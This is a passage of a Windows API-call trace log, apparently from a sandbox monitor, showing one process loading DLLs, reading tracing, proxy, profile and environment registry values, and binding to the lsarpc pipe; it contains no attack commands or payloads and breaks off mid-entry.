| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RasSetAutodialAddressA FunctionAddress => 0x76eec044 ModuleHandle => 0x76ee0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrLoadDll |
Flags => 12712688 BaseAddress => 0x76e80000 FileName => RTUTILS.DLL |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => TraceRegisterExA FunctionAddress => 0x76e8212f ModuleHandle => 0x76e80000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => TraceDeregisterA FunctionAddress => 0x76e83ff9 ModuleHandle => 0x76e80000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => TraceDeregisterExA FunctionAddress => 0x76e82d77 ModuleHandle => 0x76e80000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => TracePrintfA FunctionAddress => 0x76e81aad ModuleHandle => 0x76e80000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => TracePrintfExA FunctionAddress => 0x76e819e2 ModuleHandle => 0x76e80000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => TraceDumpExA FunctionAddress => 0x76e8253f ModuleHandle => 0x76e80000 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegCreateKeyExA |
Handle => 0x00000138 Access => 983103 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Tracing |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000138 Data => 0 ValueName => EnableConsoleTracing |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegCloseKey |
Handle => 0x00000138 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegOpenKeyExA |
Handle => 0x00000140 Registry => 0x80000002 SubKey => Software\Microsoft\Tracing\RASAPI32 |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 0 ValueName => EnableFileTracing |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 4294901760 ValueName => FileTracingMask |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 0 ValueName => EnableConsoleTracing |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 4294901760 ValueName => ConsoleTracingMask |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 1048576 ValueName => MaxFileSize |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => %windir%\tracing\x00 ValueName => FileDirectory |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 0 ValueName => EnableFileTracing |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 4294901760 ValueName => FileTracingMask |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 0 ValueName => EnableConsoleTracing |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 4294901760 ValueName => ConsoleTracingMask |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => 1048576 ValueName => MaxFileSize |
SUCCESS | 0x00000000 | |
| 07:43:40,266 | 1308 | RegQueryValueExA |
Handle => 0x00000140 Data => %windir%\tracing\x00 ValueName => FileDirectory |
SUCCESS | 0x00000000 | |
| 07:43:40,276 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00167280 | |
| 07:43:40,286 | 1308 | OpenServiceW |
ServiceControlManager => 0x00167280 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00166fa0 | |
| 07:43:40,286 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,286 | 1308 | OpenSCManagerA |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00167398 | |
| 07:43:40,316 | 1308 | LdrLoadDll |
Flags => 12712844 BaseAddress => 0x722b0000 FileName => sensapi.dll |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => IsNetworkAlive FunctionAddress => 0x722b1260 ModuleHandle => 0x722b0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | NtOpenSection |
DesiredAccess => 0x00000004 ObjectAttributes => C:\SENS Information Cache SectionHandle => 0x00000154 |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | ZwMapViewOfSection |
SectionOffset => 0x00c1fb64 SectionHandle => 0x00000154 ProcessHandle => 0xffffffff BaseAddress => 0x00cc0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000158 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000015c ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | NtQueryValueKey |
Information => T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 KeyHandle => 0x0000015c ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,316 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000168 |
SUCCESS | 0x00000000 | |
| 07:43:40,326 | 1308 | NtSetInformationFile |
FileHandle => 0x00000168 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,326 | 1308 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000168 |
SUCCESS | 0x00000000 | |
| 07:43:40,326 | 1308 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xb2F\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000168 |
SUCCESS | 0x00000000 | |
| 07:43:40,326 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,326 | 1308 | RegOpenKeyExA |
Handle => 0x00000164 Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,326 | 1308 | RegQueryValueExA |
Handle => 0x00000164 DataLength => 4 ValueName => ProxySettingsPerUser Type => 356 |
FAILURE | 0x00000002 | |
| 07:43:40,336 | 1308 | RegCloseKey |
Handle => 0x00000164 |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | LdrLoadDll |
Flags => 12711288 BaseAddress => 0x7c900000 FileName => ntdll.dll |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RtlConvertSidToUnicodeString FunctionAddress => 0x7c914c35 ModuleHandle => 0x7c900000 |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegOpenKeyExW |
Handle => 0x0000016c Registry => 0x80000003 SubKey => S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegOpenKeyExA |
Handle => 0x00000170 Registry => 0x0000016c SubKey => Software\Microsoft\windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegQueryValueExA |
Handle => 0x00000170 Data => 1 ValueName => MigrateProxy |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegCloseKey |
Handle => 0x00000170 |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | LdrLoadDll |
Flags => 12711212 BaseAddress => 0x7c9c0000 FileName => SHELL32.dll |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SHGetFolderPathW FunctionAddress => 0x7c9eed76 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegCreateKeyExW |
Handle => 0x00000174 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegQueryValueExW |
Handle => 0x00000174 Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00 ValueName => Common AppData |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | LdrLoadDll |
Flags => 12709880 BaseAddress => 0x769c0000 FileName => USERENV.dll |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => ExpandEnvironmentStringsForUserW FunctionAddress => 0x769c7733 ModuleHandle => 0x769c0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,336 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000002 SubKey => System\CurrentControlSet\Control\Session Manager\Environment |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 124 MaxValueNameLength => 22 ValueCount => 13 MaxSubKeyLength => 0 KeyHandle => 0x0000017c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00c\x00m\x00d\x00.\x00e\x00x\x00e\x00\x00\x00 ValueName => ComSpec |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00S\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00W\x00b\x00e\x00m\x00\x00\x00 ValueName => Path |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\x00\x00 ValueName => windir |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x0000017c Data => N\x00O\x00\x00\x00 ValueName => FP_NO_HOST_CHECK |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x0000017c Data => W\x00i\x00n\x00d\x00o\x00w\x00s\x00_\x00N\x00T\x00\x00\x00 ValueName => OS |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x0000017c Data => x\x008\x006\x00\x00\x00 ValueName => PROCESSOR_ARCHITECTURE |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x0000017c Data => 1\x005\x00\x00\x00 ValueName => PROCESSOR_LEVEL |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x0000017c Data => x\x008\x006\x00 \x00F\x00a\x00m\x00i\x00l\x00y\x00 \x001\x005\x00 \x00M\x00o\x00d\x00e\x00l\x00 \x001\x000\x007\x00 \x00S\x00t\x00e\x00p\x00p\x00i\x00n\x00g\x00 \x001\x00,\x00 \x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00A\x00M\x00D\x00\x00\x00 ValueName => PROCESSOR_IDENTIFIER |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 8 Handle => 0x0000017c Data => 6\x00b\x000\x001\x00\x00\x00 ValueName => PROCESSOR_REVISION |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 9 Handle => 0x0000017c Data => 1\x00\x00\x00 ValueName => NUMBER_OF_PROCESSORS |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 10 Handle => 0x0000017c Data => .\x00C\x00O\x00M\x00;\x00.\x00E\x00X\x00E\x00;\x00.\x00B\x00A\x00T\x00;\x00.\x00C\x00M\x00D\x00;\x00.\x00V\x00B\x00S\x00;\x00.\x00V\x00B\x00E\x00;\x00.\x00J\x00S\x00;\x00.\x00J\x00S\x00E\x00;\x00.\x00W\x00S\x00F\x00;\x00.\x00W\x00S\x00H\x00\x00\x00 ValueName => PATHEXT |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 11 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,346 | 1308 | RegEnumValueW |
Index => 12 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 0 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00c\x00m\x00d\x00.\x00e\x00x\x00e\x00\x00\x00 ValueName => ComSpec |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 1 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00;\x00%\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00S\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00W\x00b\x00e\x00m\x00\x00\x00 ValueName => Path |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 2 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\x00\x00 ValueName => windir |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 3 Handle => 0x0000017c Data => N\x00O\x00\x00\x00 ValueName => FP_NO_HOST_CHECK |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 4 Handle => 0x0000017c Data => W\x00i\x00n\x00d\x00o\x00w\x00s\x00_\x00N\x00T\x00\x00\x00 ValueName => OS |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 5 Handle => 0x0000017c Data => x\x008\x006\x00\x00\x00 ValueName => PROCESSOR_ARCHITECTURE |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 6 Handle => 0x0000017c Data => 1\x005\x00\x00\x00 ValueName => PROCESSOR_LEVEL |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 7 Handle => 0x0000017c Data => x\x008\x006\x00 \x00F\x00a\x00m\x00i\x00l\x00y\x00 \x001\x005\x00 \x00M\x00o\x00d\x00e\x00l\x00 \x001\x000\x007\x00 \x00S\x00t\x00e\x00p\x00p\x00i\x00n\x00g\x00 \x001\x00,\x00 \x00A\x00u\x00t\x00h\x00e\x00n\x00t\x00i\x00c\x00A\x00M\x00D\x00\x00\x00 ValueName => PROCESSOR_IDENTIFIER |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 8 Handle => 0x0000017c Data => 6\x00b\x000\x001\x00\x00\x00 ValueName => PROCESSOR_REVISION |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 9 Handle => 0x0000017c Data => 1\x00\x00\x00 ValueName => NUMBER_OF_PROCESSORS |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 10 Handle => 0x0000017c Data => .\x00C\x00O\x00M\x00;\x00.\x00E\x00X\x00E\x00;\x00.\x00B\x00A\x00T\x00;\x00.\x00C\x00M\x00D\x00;\x00.\x00V\x00B\x00S\x00;\x00.\x00V\x00B\x00E\x00;\x00.\x00J\x00S\x00;\x00.\x00J\x00S\x00E\x00;\x00.\x00W\x00S\x00F\x00;\x00.\x00W\x00S\x00H\x00\x00\x00 ValueName => PATHEXT |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 11 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TEMP |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegEnumValueW |
Index => 12 Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00T\x00E\x00M\x00P\x00\x00\x00 ValueName => TMP |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000017c ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000180 ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | NtQueryValueKey |
Information => T\x00U\x00R\x00B\x00O\x00P\x00C\x00\x00\x00 KeyHandle => 0x00000180 ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => D\x00e\x00f\x00a\x00u\x00l\x00t\x00 \x00U\x00s\x00e\x00r\x00\x00\x00 ValueName => DefaultUserProfile |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => C\x00:\x00\\x00P\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => ProgramFilesDir |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegQueryValueExW |
Handle => 0x0000017c Data => C\x00:\x00\\x00P\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00F\x00i\x00l\x00e\x00s\x00\\x00C\x00o\x00m\x00m\x00o\x00n\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => CommonFilesDir |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegCloseKey |
Handle => 0x0000017c |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | RegOpenKeyExW |
Handle => 0x0000017c Registry => 0x80000003 SubKey => S-1-5-21-1935655697-1606980848-1060284298-1003 |
SUCCESS | 0x00000000 | |
| 07:43:40,356 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | NtSetInformationFile |
FileHandle => 0x00000184 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,366 | 1308 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xb3F\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | NtSetInformationFile |
FileHandle => 0x00000180 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,366 | 1308 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xb4F\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrLoadDll |
Flags => 12709280 BaseAddress => 0x5b860000 FileName => netapi32.dll |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DsGetDcNameW FunctionAddress => 0x5b86d189 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DsGetSiteNameW FunctionAddress => 0x5b87299f ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DsRoleGetPrimaryDomainInformation FunctionAddress => 0x5b86cfdd ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DsRoleFreeMemory FunctionAddress => 0x5b86cedd ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetApiBufferFree FunctionAddress => 0x5b867a00 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetUserGetGroups FunctionAddress => 0x5b894df0 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetUserGetInfo FunctionAddress => 0x5b86acf1 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 07:43:40,366 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | NtSetInformationFile |
FileHandle => 0x00000184 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,376 | 1308 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00j(\x199\x0c\xb1\xd0\x11\x9b\xa8\x00\xc0O\xd9.\xf5\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000184 |
SUCCESS | 0x00000000 | |
| 07:43:40,376 | 1308 | NtReadFile |
